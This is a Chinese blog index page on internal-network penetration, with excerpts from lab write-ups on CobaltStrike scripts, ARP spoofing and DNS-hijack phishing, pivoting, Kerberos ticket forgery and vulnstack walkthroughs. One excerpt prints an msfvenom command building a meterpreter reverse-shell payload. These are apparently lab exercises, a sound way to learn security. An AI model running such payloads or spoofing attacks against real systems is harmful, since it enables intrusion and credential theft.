
内网渗透
文章平均质量分 71
内网渗透相关
明明如月001
这个作者很懒,什么都没留下…
展开
-
CobaltStrike脚本
正所谓"工欲善其事必先利其器",这里记录下自己平常用的一些CobaltStrike脚本,用于内网渗透、提权、永恒之蓝漏洞利用等。至于cs的使用等细节网上教程大堆,这里不再赘述。这里说下我的cs是4.0版本的因为一些脚本对于不同版本的cs可能会存在不兼容的情况,下面是具体效果图特别是k8gege的这个Ladon插件,真的厉害CrossC2不是太好用,就不写了脚本地址如下:链接:https://pan.baidu.com/s/1ocli8qMRf4Zbc-_Pu_cTvw提取码:5q9p原创 2022-03-10 09:25:57 · 853 阅读 · 14 评论 -
内网渗透之 arp欺骗-dns劫持-网站钓鱼
环境信息攻击机kali 192.168.10.124靶机win7 192.168.10.229arp欺骗用到ettercap工具1、启动ettercap -G2、设置嗅探网卡,如eth0扫描存活主机将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2进行arp欺骗此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功dns劫持1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dn原创 2022-02-26 11:22:45 · 5470 阅读 · 0 评论 -
验证内网渗透添加默认路由
内网渗透中,如果存在访问不到其它内网主机,而肉鸡又存在双网卡或者多网卡情况,就要考虑在msf中添加静态路由,如下图:在攻击者A不能直接访问服务器C,但是在拿下内网主机B后,可以通过添加静态路由,借助主机B作为跳板,对服务器C做进一步的渗透可以通过msfvenom制作一个木马,是肉鸡上线,这里我已经做好了msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.111.3 lport=8888 -f exe >shell.exe原创 2022-02-23 16:23:14 · 1844 阅读 · 0 评论 -
域渗透-白银票据和黄金票据的利用
最近做了一些靶场域渗透的实验,记录下一些关于白银票据和黄金票据的问题。0x01 白银票据的利用1 环境信息域控DC192.168.183.130域内主机win7192.168.183.1292 使用场景在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。3 利用过程说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程获取sid whoami /all伪造票据MS14-068.exe -u 用户名@域原创 2022-02-23 09:55:54 · 4016 阅读 · 2 评论 -
vulnstack2靶机笔记
0x01-前言本次实验环境为红日安全团队出品的一个实战环境。其主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。登录密码统一为:1qaz@WSX靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail原创 2022-01-26 01:29:20 · 2006 阅读 · 0 评论 -
vulnstack-Web安全入门进阶实战靶场配置
Web安全入门进阶实战课程靶场为我们提供了很多web攻击靶场,免去了自己搭建过程中遇到的各种问题。但是在实际搭建过程中,发现配置上还有有点小问题,记录一下。因为默认配置是127.0.0.1,也就是说只能在本地访问,其它主机想去访问则访问不到。有时候需要用到集成工具如果kali等其它辅助渗透的时候会不太方便,这里记录下修改配置记录。原创 2022-02-02 09:27:02 · 1816 阅读 · 1 评论 -
vulnstack1靶机笔记
0x01环境信息环境下载地址百度网盘: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset密码: 【红日安全】您的下载密码为:n1u2虚机统计密码hongrisec@2019这里我为了方便修改为admin.123网络配置如图所示0x02 渗透测试1、信息收集打开win7靶机phpStudy访问http://192.168.52.143/同时底部存在MySQL数据库连接检测: 输入默认账号密码:原创 2022-01-21 23:40:40 · 1807 阅读 · 0 评论 -
三层网络靶场搭建&MSF内网渗透
三层网络靶场搭建&MSF内网渗透在最近的CTF比赛中,综合靶场出现的次数越来越多,这种形式的靶场和真实的内网渗透很像,很贴合实际工作,但我们往往缺少多层网络的练习环境。本文通过VMware搭建3层网络,并通过msf进行内网渗透,涉及代理搭建,流量转发,端口映射等常见内网渗透技术。网络拓扑环境搭建首先在虚拟机中新建3块网卡,选择仅主机模式将kali设为第一层网络vmnet1将第一层靶机设为双网卡vmnet1和vmnet2将第二层靶机设置为双网卡:vmnet2和vmnet3:原创 2022-02-09 10:46:44 · 2642 阅读 · 0 评论 -
vulnstack4靶场笔记
0x01 实验环境目标端ubuntuIP1: 192.168.157.128IP2: 192.168.183.128ubuntu:ubuntuwin7IP: 192.168.183.129douser:Dotest123DCIP: 192.168.183.130administrator:Test2008攻击端windows7 192.168.157.129kali 192.168.157.1300x01 渗透测试首先需要进入ubuntu开启服务,原创 2022-02-05 10:23:55 · 2200 阅读 · 0 评论 -
vulnstack5靶场笔记
红日靶场5原创 2022-02-01 18:38:08 · 2523 阅读 · 2 评论